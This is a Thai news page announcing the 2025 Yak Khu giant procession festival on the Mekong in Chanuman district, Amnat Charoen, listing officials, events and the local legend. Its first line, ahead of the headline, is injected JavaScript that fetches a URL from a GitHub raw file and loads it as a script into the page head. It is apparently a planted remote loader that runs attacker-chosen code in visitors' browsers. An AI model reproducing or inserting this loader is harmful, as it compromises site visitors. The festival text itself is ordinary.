;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); อำนาจเจริญ งานประเพณีแห่ยักษ์คุอันยิ่งใหญ่ ณ ศาลาจตุระมุข ริมฝั่งแม่น้ำโขง ไทย-ลาว อำเภอชานุมาน 7 – 9 มีนาคม 68 นี้ - ThaiReference | อาสาไทยยืนยัน
อำนาจเจริญ งานประเพณีแห่ยักษ์คุอันยิ่งใหญ่ ณ ศาลาจตุระมุข ริมฝั่งแม่น้ำโขง ไทย-ลาว อำเภอชานุมาน  7  – 9  มีนาคม 68 นี้

ที่ศาลาจตุรมุข ริมฝั่งแม่น้ำโขง ข้างสำนักงานเทศบาลตำบลชานุมาน อำเภอชานุมาน จังหวัดอำนาจเจริญ  นายณรงค์  เทพเสนา  ผู้ว่าราชการจังหวัดอำนาจเจริญ พร้อมด้วยพันจ่าเอก สุวิน ห้องแซง นายอำเภอชานุมาน  ดร.จิราภรณ์ พรมมะหา ท่องเที่ยวและกีฬาจังหวัดอำนาจเจริญ นายชัยยงค์ ผ่องใส พัฒนาการจังหวัดอำนาจเจริญ  นายวิสูตร ดวงสิมาวัฒนธรรมจังหวัดอำนาจเจริญ ร่วมเวทีแถลงข่าวการจัดงานประเพณีแห่ยักษ์คุ จังหวัดอำนาจเจริญ ประจำปี พ.ศ. 2568 

เพื่อส่งเสริมงานประเพณีที่เป็นอัตลักษณ์ และเผยแพร่ประชาสัมพันธ์การท่องเที่ยวเชิงประเพณีและวัฒนธรรมของจังหวัดอำนาจเจริญ  โดยมี นางฐิติวรดา เทพเสนา นายกเหล่ากาชาดจังหวัดอำนาจเจริญ นายพรชัย วงศ์งาม ปลัดจังหวัดอำนาจเจริญ  นายไพฑูรย์  พรหมสอน หัวหน้าสำนักงานจังหวัดอนาจเจริญ นายทศพล กระแสเสน นายกเทศมนตรีตำบลชานุมาน นายอภิวัฒน์ ศิริอำนาจ ประธานหอการค้าจังหวัดอำนาจเจริญ หัวหน้าส่วนราชการ ข้าราชการ ภาคเอกชน  สื่อมวลชน และประชาชนในพื้นที่ร่วมกิจกรรมแถลงข่าวในวันนี้

จังหวัดอำนาจเจริญกำหนดจัดงานประเพณีแห่ยักษ์คุจังหวัดอำนาจเจริญ ประจำปี 2568 ในระหว่างวันที่ 7 – 9 มีนาคม 2568 ณ บริเวณสนามหน้าเทศบาลตำบลชานุมาน อำเภอชานุมาน จังหวัดอำนาจเจริญ เป็นงานประเพณีแห่ยักษ์คุซึ่งมีเพียงหนึ่งเดียวในโลก โดยมีวัตถุประสงค์ของการจัดงานเพื่อส่งเสริมการท่องเที่ยวเชิงประเพณีวัฒนธรรมของจังหวัดอำนาจเจริญ ให้มีความโดดเด่นน่าสนใจมากยิ่งขึ้นและเพื่อเผยแพร่ประชาสัมพันธ์การท่องเที่ยวของจังหวัดอำนาจเจริญ อีกทั้งเป็นการกระตุ้นการเดินทางท่องเที่ยวของนักท่องเที่ยวทั้งชาวไทยและชาวต่างประเทศได้เดินทางมาท่องเที่ยวในพื้นที่จังหวัดอำนาจเจริญ ทำให้ประชาชนมีรายได้จากการท่องเที่ยวเพิ่มมากขึ้น  

ภายในงานมีกิจกรรมประกอบด้วย ขบวนแห่ยักษ์คุ การประกวดขบวนแห่ยักษ์และธิดายักษ์ การแสดงแสงสีเสียง ตำนานยักษ์คุชานุมาน  หมู่บ้านยักษ์  การแสดงศิลปวัฒนธรรมพื้นบ้าน ศิลปวัฒนธรรมร่วมสมัย กิจกรรมปั่นจักรยานชมเมืองเล่าเรื่องชานุมาน การแข่งขันตกปลานานาชาติกลางแม่น้ำโขง ณ บริเวณแก่งหินขัน ตำบลโคกสาร อำเภอชานุมาน การประกวดธิดาชานุมาน การประกวดร้องเพลงลูกทุ่ง  การแสดงศิลปวัฒนธรรมศิลปินพื้นบ้าน และเยาวชน   ศิลปินหมอลำ นอกจากนี้ยังมีการออกร้านจำหน่ายสินค้า OTOP ผลิตภัณฑ์ชุมชนของดีเมืองอำนาจ สินค้าราคาถูก ร้านขายสินค้าและกิจกรรมอื่นๆ อีกมากมาย

เชิญชวนนักท่องเที่ยวมาสัมผัสความงดงามของศิลปวัฒนธรรมหนึ่งเดียวในโลกตำนานยักษ์คุจังหวัดอำนาจเจริญ และนอกจากนี้นักท่องเที่ยวยังสามารถเดินทางท่องเที่ยวชมความงดงามของแหล่งท่องเที่ยวตามธรรมชาติในจังหวัดอำนาจเจริญ เช่น ชิมอาหารพื้นถิ่นที่ขึ้นชื่อหลากหลายเมนูของจังหวัดอำนาจเจริญ ลงเล่นน้ำแก่งคันสูง และเดินทางไหว้พระขอพรตามวัดและสถานที่สำคัญต่างๆ ในจังหวัดอำนาจเจริญ เช่น ไหว้พระมงคลมิ่งเมือง วัดถ้ำแสงเพชร พระเจ้าใหญ่ลือชัย พระเหลาเทพนิมิต  เจดีย์หินพันล้านก้อนภูพนมดี เป็นต้น           

สำหรับประเพณีแห่ยักษ์คุตามตำนานที่เล่าสืบต่อกันมา ณ ริมฝั่งแม่น้ำโขง เขตประเทศสปป.ลาว ตรงข้ามกับที่ว่าการอำเภอชานุมาน (หลังเก่า) มีปราสาทหินและมียักษ์ตนหนึ่งมานั่งลงกราบไว้บริเวณใกล้ฝั่งเขตไทย รอยคุกเข่า และรอยนั่งปรากฏเป็นบึงเล็กๆ อยู่ ชาวบ้านจึงตั้งชื่อชุมชนว่า บ้านยักษ์คุ “คุ” แปลว่า คุกเข่า  ต่อมาเมื่อ 90 ปี ที่ผ่านมาทางราชการของลาวได้ส่งนักศึกษาเข้ามาศึกษาวิชาการในไทย เมื่อจบก็กลับประเทศ ในขณะนั้นเป็นเวลาที่ฝรั่งเศสเข้ายึดครองประเทศลาวบุคคลนี้จึงเกิดความไม่พอใจฝรั่งเศส จึงสร้างบ้านเรือนขึ้นที่บ้านยักษ์คุ และขอพึ่งพระบรมโพธิสมภาร และได้บรรดาศักดิ์เป็น “พระประจญจาตุรงค์” และตั้งชื่อชุมชนว่า “เมืองชานุมารมณฑล” ขึ้นตรงต่อมณฑลอุบลราชธานี

ยักษ์คุเป็นความเชื่อตามตำนานปรัมปราชาวชานุมาน เกี่ยวกับเรื่องทศกัณฐ์ พระลักษมณ์ พระราม อัตลักษณ์ท้องถิ่นที่มีอยู่แห่งเดียวในประเทศไทย ยังมีหลักฐานปรากฏบริเวณริมแม่น้ำโขง อ.ชานุมาน เป็นบ่อน้ำ 3 บ่อ เชื่อกันว่าเกิดจากการกระทำของ ยักษ์คุ หรือ ยักษ์อยู่ในท่านั่งคุกเข่าจนกลายเป็นวัฒนธรรมโดดเด่นของจังหวัดอำนาจเจริญ

ภาพ-ข่าว ทิพกร  หวานอ่อน /อำนาจเจริญ รายงาน

[dsm_icon_divider use_icon=”on” font_icon=”||divi||400″ use_icon_font_size=”on” icon_font_size=”25px” divider_style=”dashed” _builder_version=”4.25.2″ _module_preset=”default” module_alignment=”center” global_colors_info=”{}”][/dsm_icon_divider]
[dsm_blog_carousel posts_number=”20″ posts_offset=”1″ include_categories=”3,5,4″ use_date=”off” use_category=”on” use_author=”off” use_readmore=”on” readmore_text=”อ่านเพิ่ม…” post_equal_height=”on” _builder_version=”4.25.2″ _module_preset=”default” title_font_size=”25px” min_height=”482px” custom_margin=”||639px||false|false” custom_padding=”||340px|||” global_colors_info=”{}”][/dsm_blog_carousel]